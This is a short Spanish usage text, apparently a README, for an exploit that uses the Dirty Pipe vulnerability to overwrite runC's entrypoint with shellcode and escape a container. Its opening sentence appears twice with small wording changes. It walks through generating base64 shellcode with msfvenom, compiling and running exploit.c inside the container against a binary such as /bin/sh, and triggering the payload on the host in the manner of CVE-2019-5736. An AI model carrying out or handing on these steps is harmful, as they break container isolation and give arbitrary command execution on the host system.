
Un exploit simple que utiliza dirtypipe para inyectar shellcode en el entrypoint de runC para implementar escapes de contenedores.
Un exploit simple que utiliza dirtypipe para inyectar shellcode en el punto de entrada de runC para implementar escapes de contenedores.
Produce shellcode codificado en base64 usando msf:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
Compila y ejecuta en el contenedor, el nombre de archivo sobrescrito es el binario que runC ejecutará en el contenedor (por ejemplo, /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
Activa el exploit y el shellcode fuera del contenedor como CVE-2019-5736.